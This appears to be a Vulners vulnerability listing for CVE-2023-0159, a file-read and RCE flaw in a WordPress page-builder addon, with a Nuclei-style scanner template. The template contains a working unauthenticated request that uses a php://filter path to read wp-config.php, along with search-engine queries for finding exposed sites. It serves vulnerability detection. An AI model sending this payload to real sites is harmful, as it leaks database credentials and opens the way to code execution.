| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| The vulnerability of the Extensive VC Addons plugin of the WordPress content management system allows attackers to expose sensitive information that should be protected. | 13 Feb 202400:00 | – | bdu_fstec | |
| CVE-2023-0159 | 11 Sep 202311:49 | – | circl | |
| WordPress plugin Extensive VC Addons for WPBakery page builder 路径遍历漏洞 | 13 Feb 202300:00 | – | cnnvd | |
| CVE-2023-0159 | 13 Feb 202314:32 | – | cve | |
| CVE-2023-0159 Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE | 13 Feb 202314:32 | – | cvelist | |
| Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE) | 19 Mar 202500:00 | – | exploitdb | |
| CVE-2023-0159 | 13 Feb 202315:15 | – | nvd | |
| CVE-2023-0159 | 13 Feb 202315:15 | – | osv | |
| WordPress Extensive VC Addons for WPBakery Page Builder 1.9.0 Code Execution | 24 Mar 202500:00 | – | packetstorm | |
| WordPress Extensive VC Addons for WPBakery page builder Plugin < 1.9.1 is vulnerable to Local File Inclusion | 23 Jan 202300:00 | – | patchstack |
id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author: c4sper0
severity: high
description: |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
impact: |
Unauthenticated attackers can exploit parameter validation flaws in the template loading mechanism to read arbitrary files including wp-config.php and escalate to remote code execution using PHP filter chains.
remediation: Fixed in 1.9.1
reference:
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
- https://wordpress.org/plugins/extensive-vc-addon/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0159
epss-score: 0.55736
epss-percentile: 0.98919
cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wprealize
product: "extensive_vc_addons_for_wpbakery_page_builder"
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/"
fofa-query: "body=/wp-content/plugins/extensive-vc-addon/"
publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success","message":"Items are loaded","data":'
- type: status
status:
- 200
# digest: 4b0a004830460221008f0bb61bd55218a11d13817c6710de8d3e547bf9116030795436143a230810a2022100bb823b8eb61b5a56ea46fc2730ed53a45ec05ba44673b4278ea034549ec7dbcc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation